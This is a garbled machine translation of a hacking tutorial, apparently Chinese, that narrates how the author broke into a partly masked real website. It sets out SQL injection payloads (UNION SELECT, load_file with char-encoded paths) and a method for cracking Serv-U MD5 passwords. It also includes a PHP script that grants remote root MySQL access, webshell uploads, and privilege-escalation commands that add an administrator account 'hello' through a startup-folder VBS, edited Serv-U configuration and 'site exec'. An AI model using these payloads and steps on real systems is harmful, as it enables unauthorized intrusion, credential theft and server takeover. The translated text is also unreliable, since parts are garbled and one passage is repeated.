Text / Total Gong Ge Preface: From 2003, more and more friends in China like scripting attacks, various ASP injection methods, skills, it is really not poor! At the same time, there are many good injection tools, the most typical bamboo nbsi and smelly ESC, the GetWebshell on the MSSQL database is equipped with smelling GetWebshell, even if the tiger is like a fish! With the increasing maturity of ASP injection, PHP mysql injection has gradually risen, and many friends also transferred to this! It also has a better tool such as CASI and Dova. Next, combined with a specific example, the edge of the theory is described in detail how to inject the vulnerability by a small PHP, trigger the deciphering Serv-U password, upload phpshell, control the mysql database, and how to improve system permissions! This article is for everyone to refer to, together with technology, and also hopes that the administrator will make up for system vulnerabilities, and the website, pictures, vulnerabilities, if there is similar, purely coincident. Quoted a very classic words "seeking unity in the opposition of attack and defense!" 1. PHP injection vulnerability, shocking file content (1) Manual injection method (1) Finding PHP injection vulnerabilities usually like to watch articles on some well-known websites, download Their latest animation! Sometimes I saw the parameters, the hand itch (^_^), I want to add "'", "and 1 = 1", "and 1 = 2" test test after they. No way! http://www.*****.Net/down/show.php? id = 100 This page actually there is a PHP injection vulnerability! Add "'" http://www.******.net/down/show.php? Id = 100' program output error results: warning: mysql_fetch_object (): Supplied Argument is not a valid MySQL Result resource in d: / ****** / down / show.php on line 45 Warning: mysql_fetch_array (): Supplied Argument is not a valid mysql result resource in d: / ****** / down / global .php on line 578 wow, the system's physical path and database type burst! This provides path conditions for the software to download the software on the download of the server! Submitted: http://www.*****.Net/down/show.php? Id = 100 and 1 = 1 A normal page, submitted: http://www.6***.net/down /Show.php?id=100 and 1 = 2 The corresponding software introduced in the page shows "unknown", indicating that there is a PHP injection vulnerability. As shown in the following figure: Related knowledge points: In the php.ini file, Magic_QUOTES_GPC Boolean sets special characters of Get / Post / Cookie three modules, including single quotes, double quotes, anti-sliding lines, and empty font ( NUL) Do you want to automatically add a backslash when it is overflowing the character; Display_errors Boolean This option sets whether you want to display the error message to be displayed on the user's browser.
A little experienced friend will know, it originally used the night cat download system! Hurry download a source of the source look, find that there is no way to filter your ID! ***. Net / down / show.php? id = 100 and 1 = 2 Union Select 1 appears: Warning: mysql_fetch_object (): Supplied Argument is not a valid mysql result resource in d: / ****** / Down / show.php on line 45 Warning: mysql_fetch_Array (): Supplied Argument is not a valid mysql result resource in d: / ****** / down / global.php on line 578 Continue to submit: http: // www *****. Net / down / show.php? id = 100 and 1 = 2 Union SELECT 2, 1 also appears above! When we submit: http://www.*****.Net/down/show.php? Id = 100 and 1 = 2 Union SELECT 19, 18, 17, 16, 15, 14, 13, 12, 11, 10, 9, 8, 7, 6, 5, 4, 3, 2, and 1 have no error prompt interface, where the above statement select, the number of numbers of the above statement, means the location of the table field appearing in the library For example, the 16, the 14th, such as the 16, the application platform is 14, etc. 19 shows that this table has 19 fields. ㈢㈢ The content of the file will introduce several important functions: In the SQL statement, you can use a variety of MySQL built-in functions, often use Database (), user (), system_user (), session_user (), current_user () Version () these functions to get some information information, as well as a more overweight function, is load_file (), the function of the function is to read the file, and return the file as a string back . We have to read the files in the computer, but also have conditional restrictions: 1, know the correct path; 2, have permission reading and file must be readable; 3, want to read the file must be less than MAX_ALLOWED_PACKET. If the file does not exist, or because any of the above reasons cannot be read, the function returns empty. Next we submit the following statement: http://www.*****.Net/down/show.php? Id = 100 and 1 = 2 Union Select 19, Database (), 17, current_user (), system_user ( ), Version (), 13, 12, 11, 10, 9, 8, 7, 6, 5, 4, 3, 2, 1 to see the system information is as follows: Next, let's submit the following statement: http: // Www. *****. Net / down / show.php? id = 100 and 1 = 2 Union Select 19, Database (), 17, current_user (), system_user (), version (), 13, 12 ,11 10, 9, load_file ('d: / ****** / down / include / config.inc.php'), 7, 6, 5, 4, 3, 2, 1, the same occurrence of the error prompt.
Obviously, the error is in Load_File ('D: / ****** / down / include / config.inc.php'). Related knowledge points: The program did not put D: / ****** / downinclude / config.inc.php content is old and old, because in php.ini magic_quotes_gpc = ON, how can I construct a statement without quotation marks? ? Friends who often look at the black defense should be easily constructed, and the 4-year-old Dark Seventh Security Angel. The "SQL INJECTION WITH MYSQL" article introduced with a char () function or transitions to a 16-based implementation. 'd: / ****** / down / include / config.inc.php', is Char (100, 58, 92, 42, 42, 42, 42, 42, 42, 92, 100, 111, 119, 110, 92, 105, 110, 99, 108, 117, 100, 101, 92) , 99,111,110,102,105,103,46,105,110,99,46,112,104,112) or "0x643A5C2A2A2A2A2A2A5C646F776E5C696E636C7564655C636F6E6669672E696E632E 706870" Next, we submit the following statement: http: //www.*****.net/down/show.php id = 100 and 1 = 2? Union Select 19, Database (), 17, current_user (), system_user (), version (), 13, 12, 11, 10, 9, loading_file (char (100, 58, 92, 42, 42, 42, 42) 42, 42, 92, 100, 111, 119, 110, 92, 105, 110, 99, 108, 111, 110, 101, 105, 103, 111, 105, 110, 99, 46, 112, 104, 112)), 7, 6, 5, 4, 3, 2, and 1 see the configuration file config.inc.php content as follows: Success : Http://www.*****.Net/down/show.php? Id = 100 and 1 = 2 Union Select 19, Database (), 17, current_user (), system_user (), version (), 13,12,11,10,9, load_file (char (100,58,92,42,42,42,42,42,42,92,100,111,119,110,92,105,110,99,108,117,100,101,92,99,111,110,102,105,103,46,105,110,99,46,112,104,112)), 7, 6, 5, 4, 3, 2, 1 from Ymdown_User Into Outfile 'D: / ****** / DOWN / INCLUDE / Configicnphp.txt' (that is, the directory is char () or hexadecimal No, please expert guidance ^ _ _ ^) The above introduction is a manual method to see the document content. (Ii) Tool Injection 1 Injection Tool 2 Wait In "URL" place, there is an injected website, do not forget the parameters. "Keywords of the injecting page": Because the content is added to the AND 1 = 1 and the content displayed by the AND 1 = 2 pace, "the keyword of the injection page" is existed on the page when adding and1 = 1, and adding and 1 = 2 When the word does not exist, take a time for the keyword here. Click the "Detection" button soon will appear in the table in the table. Compared to handle, it is fast and easy! Click "Import List" to read text files (BIAO.TXT, you can add a table name in this file) in the table name to the right text box.
Click the "Guess Form" button to start guess the name. "Generate Backup" is used to back up the table! (Backup in this injection is not successful, I hope the expert guidance!) 2 Injecting Tool Casi How to use Casi A quite good PHP injection tool, use it to easily get the file content! And there are four tools such as mysql connectors! After taking me, it guess the number of fields is 51. Let's take a detailed introduction to how to use it to display the file content: Advance the URL of the injecting vulnerability in "Inject URL" includes parameters; "judgment character" General default mysql_fetch_array (mysql_fetch_array) ARRAY. Syntax: Array MySQL_FETCH_ARRAY (int result) , INT [Result_TyP]); Passage Value: Array Form Category: Database Function This file is used to remove the query result result. If Result does not have information, then return false value. And this purpose can Saying is a strengthening of SQL_FETCH_ROW.HTM "> mysql_fetch_row (), in addition to the return column and digital indexes into the array, you can put the text index into the array. If you are a few backup fields The name of the text is valid. The solution is to use a digital index or tap the name (alias) for these same names. It is worth noting that the processing speed using this one is actually Slow than SQL_FETCH_ROW.HTM "> MySQL_FETCH_ROW () is slow, which letter is used to use the demand decision. Parameter result_typ is a constant value, with several constant mysql_assoc, mysql_num and mysql_both.) Then point" field "field Scanning button, in the bottom of the text box, the scan results will appear. If there is a vulnerability, the number behind Select will appear on the corresponding position of the web page. In the Rio Code Bar, LoadFile Insert Position ", 8" indicates that the file content will appear in the page 8 appearing in the page, the target file Path enters the write to the file you want to view, as shown, click "OK "The file code appears in the previous appearance of 8 in the following text box will appear as shown. In the violent code, the username is inserted. ", 16" indicates that the username appears in the page 16 appears in the page; the username field indicates the name of the field represents the field name, this table is UserName; use password Insert location ", 14" means: Display the user password to appear in the page 14 in the page; use the password field name to indicate the name of the field representing the user password in the table, this table is Password; the table name is indicated: Name, this table is YMDown_user; After the sideways on the right, the username and password appear at 16 and 14, respectively. "Stop", "Refresh", "Forward", "Back", "Browse", similar to the IE browser, here is not described here.
In the toolbar bar, there is "Background Scan", "WHOIS Query", "MySQL Connector", "HTTP Head Information" four tools, click the background "Scan button" to appear in the program information, the URL, Then use the method described earlier to see it, you will get a lot of important information. You will get a lot of important information. Click "WHOIS query", there will be a page page that can be queried in four ways http://whois.Webhosting.info/, special When you press the IP query, enter an IP you can find all the domain names hanging on the same IP, which is the key to the next infringement; click the "MySQL Connector" button, there is a mysql connector login interface, using the following story After getting the username and password, you can log in to the show! It is worth noting that if the connection is successfully entered, there is a "shut down mySQL" button, be careful, click, MySQL can be turned off, then you will report an error when browsing the web, Mysql database connection failure! ! When executing the SQL statement operation, the command result does not look back, so the syntax must be correct, otherwise I don't know why! Click the "HTTP header information" button to display the HTTP header information in the program information! First, mysql library No external connection, deep digging serv-u password 1casi wonderful look at the content of the table, we still use the CASI tool, after all, this is faster! With CASI we can get the background password of the download system! (Can also pass the statement: http://www.php? Id = 100 and 1 = 2 Union Select 19, 18, 17, Username, 15, Password, 13, 12, 11, 10, 9, 8, 7, 6, 5, 4, 3, 2, 1 from YMDown_User) As shown: Enter its download management page : Http://www.******.Net/down/admin/index.php Dizique, the principle The administrator deletes it, it seems that this road is not available! (The difficult journey has just begun, there are many places behind, the administrators have made the corresponding settings, see how I came to break through the layer line!) At http: //www.****.net/down/show. There is a "management" link in the upper left corner of the PHP page! Click to see it is an empty link; then "upload", you need to log in, this is the pace of the night cat articles system, and we are here to see its article system. Use CASI to first view the contents of the configuration file: http://www.*****.Net/Article/include/config.inc.php content and download system are similar.
The content is as shown in the following figure: Touching luck, enter the download system user and password login management page, login failed! In two system configuration files, we can know that their database names are Download and Article, respectively, because the article system is not looking into the vulnerability, there is no way to read its username and password, how can I enable cross-library inquiry by downloading the system ? (I have no success! Is there any way? Is there any way? MySQL's password will stay in C: /Windows/my.ini (Note: Win2000 is c: /winnt/my.ini ,win2003 is a c: / windows/my.ini file, view its content, dizzy, no file It seems that the administrator deletes the file or moves to another directory! How does the table in MySQL and the table in the library store in the computer? Answer: / MySQL / DATA / Database Name / Table Name. Suffix Name (The suffix name has MYD, FRM, MYI, where all of the tables in the table). Using administrators the habit of default path when installing software, we can easily guess the physical paths of the files we want. Use the CASIQL/Data/mysql/user.myd file content as follows: 7 LeCalhostroot66121EFB4645A6
root66121efb4645a6
root66121efb4645a6
; LocalHostDownload7D27F0DB44 ** EA1D [1] [1] [1] [1] [1] [1] [1] [1] [1] HD5D33A536 [1] [1] [1] [1] [1] [ 1] [1] [1] [1] [1] [1] [1] [1] [1] [1] [1] [1] [1] [1] [1] [1] 4A [1 ] [1] [1] [1] [1] [1] [1] [1] [1] [1] [1] [1] [1] [1] [ 1] [1] [1] [1] The administrator did not open the remote user at all (localhost indicates the local connection,% represents a remote connection), using the Niu family Mysql connector no way to log in remotely! It seems to be the sentence: "This road is not passing". Take a look at the contents of c: / mysql/data/download/username.myd, the username and password of the download system you get in front of us is inside ^ _ ^; look at the C: /MYSQL/Data/Article/User.myd file Content, page display is not, dizzy, is this table does not exist or empty? (This is also an administrator to do it!) It seems that I want to enter the background of the article system, it is the sentence "this road is not passing"! Still often memories! ; LocalHostDownload7D27F0DB44 ** EA1D [1] [1] [1] [1] [1] [1] [1] [1] [1] HD5D33A536 [1] [1] [1] [1] [1] [ 1] [1] [1] [1] [1] [1] [1] [1] [1] [1] [1] [1] [1] [1] [1] [1] 4A [1 ] [1] [1] [1] [1] [1] [1] [1] [1] [1] [1] [1] [1] [1] [ 1] [1] [1] [1] The administrator did not open the remote user at all (localhost indicates the local connection,% represents a remote connection), using the Niu family Mysql connector no way to log in remotely! It seems to be the sentence: "This road is not passing". Take a look at the contents of c: / mysql/data/download/username.myd, the username and password of the download system you get in front of us is inside ^ _ ^; look at the C: /MYSQL/Data/Article/User.myd file Content, page display is not, dizzy, is this table does not exist or empty? (This is also an administrator to do it!) It seems that I want to enter the background of the article system, it is the sentence "this road is not passing"! Still from a long discussion, 2HSACN, the new idea is taken out to take out the short-sighted scanning tool of HScan.exe, the scan results are as follows: Open 21 port, log in to a try or serv-u5.0. Use CASI view again to view: C: / Program Files / Serv-U / Servudaemon.ini (this is also the default installation path of Serv-U)! This is a core file! There are many important contents inside: such as user name, user number, password, user's directory and the operation permission to this directory.
The main contents are as follows: [Global] Version = 5.0.0.4 ......... [domains] Domain1 = 211.92. ***. * || 21 | ***. Net | 1 | 0 | 0 [Domain1 ] USER1 = b ****** n | 1 | 0 ... [user = b ****** n | 1] password = gk5 **** EF75 *** 2A8182464CD7EE8B *** C homedir = d: / s *** n / a *** lover / photo / gallery relpaths = 1 timeout = 600 access1 = d: / s *** n / a *** lover / photo / gallery | rwamlcdp skeyvalues = ... 3 deep digging serv-u password method 1: Blasting method. How is the key to a user name and password? I have searched a tool (serv-upasscrack1.0a.rar) that specializes in the SERV-U password (SERV-UPASSCRACK1.0A.rar), it is too slow, this is going to come here! Simply open its script crack.vbs with Notepad. Look at the principle of decryption: Suppose the original expressword password is "password_mingwen" means that the cipher textword is the password (34-bit) we see in Servudaemon.ini, with "password_miwen" means that the first two mergers of the ciphertext , Then after the MD5 encryption is just equal to the mid-text! That is: MD5 (Password_Mingwen Left (Password_Miwen, 2) = Right (Password_Miwen, 32) As the saying goes, "Workers want to do good things, must first make a tool" to find two perfect tools on the Internet! One Is MD5CRACKSPV2.3 (speed enhanced version, a very easy to use MD5 blasting tool), the other is a dictionary expert. BBST, use it we can generate the first two dictionary to specify letters for us !! MD5crackspv2.3 speed, We can specify the number of threads, I have made a test in the P4, 256M memory environment, using dictionary experts. BBST generates a dictionary containing 300 million records, 1.2g, with MD5CRACKSPV2.3 to run 8 threads, total It took 30 minutes! A thread runs about 20,000 records, 8 threads for a second, is 160,000 records !! Calculate a machine to run about 13.8 billion records a day! If there is ten Taiwan P4 continuous homework, power is endless! At the same time, I saw that the news said that Shandong University has studied the algorithm of cracking MD5! But did not find specific procedures, programs are not dense, I am afraid that many websites have to be !! Method 2: Procedure method. Don't hang on a tree, hanging dictionary blasting, while see if there is any other way, do you have a double tube, you have to be idle (haha)! In C: There are more than ten users in the / program files / serv-u / servudaemon.ini file, one of which is user directory: "D: / s *** n / a *** lover / photo / gallery" attracted me.
Immediately http: //www.*****.net/ a *** lover / photo / gallery appears as follows: "This Virtual Directory Do Not Allow Contents To Be listed", try it Previous directory Take a look: http://www.*****.net/ a *** lover / photo / really the mountain heavy water repeated, Liu Dark Manti is another village! It turns out that there is a certain online album in the machine. First register a user to go in and see, there is a picture uploading function, the capture to see if there is a vulnerability with similar mobile network UPFILE, fail after submission, the upload type is still a picture file, and that sentence: "This Unless. Use the CASI to view http://www.*****.net/ a *** lover / photo / index.php file content knows: Program Chinese Name: Text Photo Manager English Name: NeatPIC Version: 2.0 .13 beta, the old rules first to the next research study is said. The analysis directory structure is found in: Database / User.php file is used to store registration information such as username password! Use CASI to open: http://www.****.net/ a *** lover / photo / database / user.php shows no file content! Is it wrong with the default directory? ! The administrator changed the directory! ! See configuration file: http://www.6***.net/ a *** lover /photo / inc / config.inc.php discovery: // parameter setting // ********* ************************ $ dataDir = "database678"; // miscellaneous data storage directory $ CATDIR = "second"; // second class classification data Store Directory $ Sortdir = "Main"; // Classified Data File Start Directory $ 7 PicRecorddir = "Picdata"; // Picture Data Total Directory $ PicDir = "PIC"; // Image File Storage Directory $ spicdir = "spic"; / / Thumbnail Storage Directory $ CommentDir = "Comment"; // Picture Comment Directory $ UserDat = "User.php"; // User Data File $ DAT = "DAT.PHP"; // Album Data File Surea Administrator Put the default The Database directory is changed to Database678! You can now view the user.php of User.php now as shown below: Which line of the following line is ID = 1 is the administrator's registration information, the first one is the user name, the second is the password.
It is found that the user name is the same as servudaemon.ini, will the password will not be the same? (Many people have habits using the same password !!) Open the DOS window -> Login FTP -> Enter the username and password, success, finally succeeded! It's not easy to pull this password! ! At this time, where is the dictionary hang, I have to take a password of this 8-bit pure letters, I have to spend a period of time! ! First, upload phpshell, control the mysql database through the access1 = d: / s *** n / a *** lover / photo / gallery | rwamlcdp in the servudaemon.ini file, know that the user has: reading (r), write (W), add (A), etc., only the "Execution (E)" function is missing! Using the PUT command to upload a sentence of WebShell. Run http://www.****.net/ a *** lover /photo / gallery / Webshell.php? Cmd = DIR, appears in the browser Warning: passthru (): unable to fork [dir] in d: / s *** n / a *** lover / photo / gallery / Webshell.php on line 1 It seems that the external command cannot be executed, the administrator must work Corresponding settings. Upload a phpinfo.php file
Run in the browser: http://www.****.net/ a *** lover / photo / gallery / phpinfo.php, at this time, the settings of the php.ini variable are displayed (of course also You can use the CASI to see the contents of C: /Windows/php.ini! The reason why the external command cannot be performed here:
safe_modeOffOffsafe_mode_exec_dirno valueno valuesafe_mode_gidOffOffsafe_mode_include_dirno valueno value next to upload their series with only a browse, copy, rename, PHPSHELL delete files and upload files five functions: CMD.PHP Note: Due to time constraints code interface is not optimized well in dir text In the box, enter the directory name you want to browse; in the Copy Text box, enter the source file as d: /web/cmd.php, enter the target file below, if you want to delete it in the DEL text box. The file name is like: d: /web/cmdbak.php; the ren command is similar to the copy command; click the button, select the file you want to upload, then click the UPLOAD button, upload the same directory as this shell. Run: Run: http://www.*****.net/ a *** lover / photo / gallery / cmd.php, use the dir command, you can see the D disk, c: / windows, and C: / Program files Content, and write permissions to the D disk! How can you download the software to the web directory by the copy command to download the file to a read-only C drive? This is going to pass mysql ! But MySQL has no remote connection! There is no condition to create conditions, see the contents of the article system config.inc.php? $ dbhost = "localhost"; // Database host name $ dbuser = "root"; // Database Username $ dbpass = "******"; // Database Code $ DBNAME = "Article"; // Database Name database username and password know, unfortunately, local users, how can we add a remote user with the highest authority user root? The answer is yes. To this end, I have written a program addUser.php to add an account plus a remote root permissions using the account with the ROOT permission, as follows:
$ dbh = mysql_connect ('localhost: 3306', 'root', '*****'); // echo mysql_errno (). ":" .mysql_error (). ""; mysql_select_db ('mysql'); echo MySQL_ERRNO (). ":" .mysql_error (). "" "" "; $ query =" grant all privileges on *. * to username @ '%' Identified by 'Password' with grant option "; $ res = mysql_query ($ query, $ dbh); echo mysql_errno (). ":" .mysql_error (). "; $ err = mysql_error (); if ($ err) {echo" Error! ";} else {echo" add user ok! "; }?> After using cmd.php uploads addUser.php execution, add a remote root account in the library, you can connect with the mysql connector belt! ! It can turn the mysql library! ! Use the records of the cattle to browse the records in the table! ! As shown below: Users of users are the remote user added. Fourth, the upgrade permission FTP is servu5.0.0.4 and has a username and password. It will naturally think of whether there is overflow. Search a tool SFTP on the Internet to perform SFTP -I 211.92. ***. *** --ub ***** B -P ****** -T 1 -O 1 -P 21 has no overflow success, it seems to be the administrator to patch! What else doesn't think about it! (-I means IP address, -u username, -P password -O operating system type, -p port number) summarizes several improved permissions for reference: Method 1, open the agar MYSQL connector, Command line input: user download; create table cmdphp (cmd text); INSERT INTO CMDPHP VALUES ("SET WSHSHELL = CREATEOBJECT (/" wscript.shell/ ")"); Insert Into cmdphp valuees ("a = wshshell.run / "cmd.exe / c net user hello hello /", 0) "); INSERT INTO CMDPHP VALUES (" B = WSHSHELL.Run (/ "cmd.exe / c net user localgroup administrators hello / add /", 0) "); Select * from cmdphp intefile" c: // Documents and settings // administrator // [start] menu // Program // Start //cmdphp.vbs "; Note: Use" // "in the path Instead of "/", when you have double quotes, you must add "/".
The principle is: We built a table cmdphp in the Download database, a field cmd in the table, and we write the command to execute to the table, then export to the startup menu in the table! This will get an administrator-level user Hello after one revolution. D: / s *** n / a *** lover / photo / gallery method 2, modify the corresponding content in Serv-U of the file servudaemon.ini: Password = HQ50AAF4CB3FA4EF89C9E9D605B20B2971 HomeDir = C: / Relpaths = 1 Timeout = 600 Access1 = D: / s *** n / a *** lover / phototence = system SkeyValues = Change the password to the password we know, change the main directory into c: /, the catalog after Access1 can not be To change it, make the administrator look in the serv-u or the previous directory name, | rwamelcdp This string is a key, we added a "e" representative before we have "execute" permissions, maintenance = system means our The identity is an administrator. After setting up, you will start thinking about it, replace its files? First, use which CMD .. PHP shell's upload file function, first upload it to the D: / S *** n / a *** lover / photo / gallery directory (after the successful file, the file and shell are in the same directory), and then open the agar mysql Connector: User Download; Create Table Servu (CMD text); load data infile "D: //s***n//a***1/////roemon.ini; select * from servu INTO OUTFILE "C: / Program Files / Serv-U / Servudaemon.ini"; which user we are administrator after the Serv-U restart, and we have executable permissions in the C-drive root directory. Mount Serv The following command is performed on the server: quote Site Exec net.exe user hello hello / add quote site exec net.exe localgroup administrators Hello / Add, we have got an administrator-level user hello. If there is no 3389 we can use PUT uploaded to it uploaded 3389.exe, and then executed with quote, you can use the 3389 login to connect! Similarly, we can also log in to DOS with another small tool XYZCMD.EXE, which will get a cmdshell. Method 3: Since the administrator has made some restrictions in php.ini, the uploaded phpshell cannot perform external commands, using cmd.php browsing commands, you can find its PHP and Serv-U installed installations in it, down In this machine, it simulates its environment, configures its own php.ini file, so that it can perform an external command, explain the ASP and CGI, and then use method two to replace its php.ini file. There is also a condition is the web restart. Can take effect.
